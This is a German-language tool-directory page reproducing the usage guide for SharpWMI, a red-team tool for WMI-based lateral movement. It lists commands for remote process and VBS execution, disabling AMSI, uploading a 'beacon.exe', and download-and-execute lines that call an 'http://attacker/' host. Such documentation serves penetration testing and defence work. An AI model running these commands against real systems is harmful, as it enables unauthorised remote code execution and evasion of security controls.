Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SharpWMI — SharpWMI ist eine C#-Implementierung verschiedener WMI-Funktionalitäten. | Kitploit
Tools/GitHubGitHub/ghostpack/sharpwmi
Privilege EscalationLaterale BewegungInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool
GitHubghostpack/sharpwmi

SharpWMI

SharpWMI ist eine C#-Implementierung verschiedener WMI-Funktionalitäten.

Repository anzeigen
767137vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SharpWMI


SharpWMI ist eine C#-Implementierung verschiedener WMI-Funktionalitäten. Dazu gehören lokale/entfernte WMI-Abfragen, die Erstellung entfernter WMI-Prozesse über win32_process und die entfernte Ausführung beliebiger VBS über WMI-Ereignisabonnements. Alternative Anmeldeinformationen werden ebenfalls für entfernte Methoden unterstützt.

@harmj0y ist der Hauptautor.

SharpWMI ist unter der BSD-3-Klausel-Lizenz lizenziert.

Verwendung

root@kitploit:~
  Local system enumeration:        
    SharpWMI.exe action=query query=""select * from win32_service"" [namespace=BLAH]

  Remote system enumeration: 
    SharpWMI.exe action=query [computername=HOST1[,HOST2,...]] query=""select * from win32_service"" [namespace=BLAH]

  Remote system Logged On users enumeration:
    SharpWMI.exe action=loggedon [computername=HOST1[,HOST2,...]]

  Remote process creation: 
    SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command=""C:\\temp\\process.exe [args]"" [amsi=disable] [result=true]

  Remote VBS execution: 
    SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]

  File upload via WMI:
    SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source=""C:\\source\\file.exe"" dest=""C:\\temp\\dest-file.exe"" [amsi=disable]

  Remote firewall enumeration :
    SharpWMI.exe action=firewall computername=HOST1[,HOST2,...]
    
  List processes:
    SharpWMI.exe action=ps [computername=HOST[,HOST2,...]]

  Terminate process (first found):
    SharpWMI.exe action=terminate process=PID|name [computername=HOST[,HOST2,...]]

  Get environment variables (all if name not given):
    SharpWMI.exe action=getenv [name=VariableName] [computername=HOST[,HOST2,...]]

  Set environment variable:
    SharpWMI.exe action=setenv name=VariableName value=VariableValue [computername=HOST[,HOST2,...]]

  Delete an environment variable:
    SharpWMI.exe action=delenv name=VariableName [computername=HOST[,HOST2,...]]

  Install MSI file:
    SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path=""C:\\temp\\installer.msi"" [amsi=disable]

NOTE: 
  - Any remote function also takes an optional ""username=DOMAIN\\user"" ""password=Password123!".
  - If computername is not specified, will target localhost.

Die Option result=true bei action=exec (alternativ action=create) bewirkt, dass SharpWMI nach der Erstellung des entfernten WMI-Prozesses die Ausgabe des Befehls zurückgibt. Dies funktioniert, indem die Ausgabe des Befehls in einer Instanz eines beliebigen WMI-Objekts gespeichert wird. Dieses Objekt wird dann vom Aufrufer abgerufen und auf seinen ursprünglichen Wert zurückgesetzt.

VBS-Skriptausführung:

Die Aktion executevbs wurde im Vergleich zur Originalversion von SharpWMI überarbeitet. Die Skriptspezifikation, definiert in [script-specification], bietet die folgenden Methoden, um dieses Tool auf den Ziel-VBS-Code auszurichten:

root@kitploit:~
  A) Executes OS command via preset VBS code:
    SharpWMI.exe action=executevbs [...] command="notepad.exe"

  B) Downloads Powershell commands from URL and execute them from within VBS via Powershell's StdIn:
    SharpWMI.exe action=executevbs [...] url="http://attacker/myscript.ps1"

  C) Download a binary file from given URL, store it in specified path and then execute it:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe"

  D) Download a binary file from given URL, store it in specified path and then execute arbitrary command:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe" command="%TEMP%\bar.exe -some -parameters"

  E) Read VBS script from file and execute it:
    SharpWMI.exe action=executevbs [...] script="myscript.vbs"

  F) Execute given VBS script given literally:
    SharpWMI.exe action=executevbs [...] script="CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\")"

  G) Base64 decode input string being encoded VBS script and execute it on remote machine:
    SharpWMI.exe action=executevbs [...] scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIi[...]"

  H) Read contents of given file, base64 decode them and then execute on target machine:
    SharpWMI.exe action=executevbs [...] scriptb64="myscript.vbs.b64"

  Finally, 'executevbs' action may have additional [time-specs] defined in seconds - they specify script trigger and wait timeouts:
    SharpWMI.exe action=executevbs [...] trigger=5 timeout=10

Beispiele:

root@kitploit:~
  SharpWMI.exe action=query query=""select * from win32_process""

  SharpWMI.exe action=query query=""SELECT * FROM AntiVirusProduct"" namespace=""root\\SecurityCenter2""

  SharpWMI.exe action=loggedon computername=primary.testlab.local

  SharpWMI.exe action=query computername=primary.testlab.local query=""select * from win32_service""

  SharpWMI.exe action=query computername=primary,secondary query=""select * from win32_process""

  SharpWMI.exe action=exec computername=primary.testlab.local command=""powershell.exe -enc ZQBj...""

  SharpWMI.exe action=exec computername=primary.testlab.local command=""whoami"" result=true amsi=disable

  SharpWMI.exe action=executevbs computername=primary.testlab.local command=""notepad.exe"" eventname=""MyLittleEvent"" amsi=disable

  SharpWMI.exe action=executevbs computername=primary.testlab.local username=""TESTLAB\\harmj0y"" password=""Password123!""

  SharpWMI.exe action=upload computername=primary.testlab.local source=""beacon.exe"" dest=""C:\\Windows\\temp\\foo.exe"" amsi=disable

  SharpWMI.exe action=terminate computername=primary.testlab.local process=explorer

  SharpWMI.exe action=getenv name=PATH computername=primary.testlab.local

  SharpWMI.exe action=setenv name=FOO value=""BAR"" computername=primary.testlab.local

  SharpWMI.exe action=delenv name=FOO computername=primary.testlab.local

  SharpWMI.exe action=install computername=primary.testlab.local path=""C:\\temp\\installer.msi""

Lokale TCP-Netstat-Informationen von einem entfernten Windows 10-Computer abrufen:

root@kitploit:~
SharpWMI.exe action=query computername=COMPUTER query="Select LocalPort,OwningProcess from MSFT_NetTCPConnection" namespace="ROOT\StandardCIMV2"

Kompilieranweisungen

Wir planen nicht, Binärdateien für SharpWMI zu veröffentlichen, Sie müssen es also selbst kompilieren :)

SharpWMI wurde für .NET 3.5 erstellt und ist mit Visual Studio 2015 Community Edition kompatibel. Öffnen Sie einfach die Projektdatei .sln, wählen Sie "Release" und erstellen Sie das Projekt.

Autoren

Tool herunterladen
BeitragAutor
Original SharpWMI-ImplementierungWill Schroeder @harmj0y
Idee zur WMI-Code-AusführungsausgabeEvi1cg @Ridter
AMSI-Umgehungscode aus SharpMove übernommenSteven Flores 0xthirteen
Verbesserungen, VBS-Flexibilität, DateiuploadMariusz B. / mgeeky @mariuszbit
MSI-Dateien installierenJustin Bui @slyd0g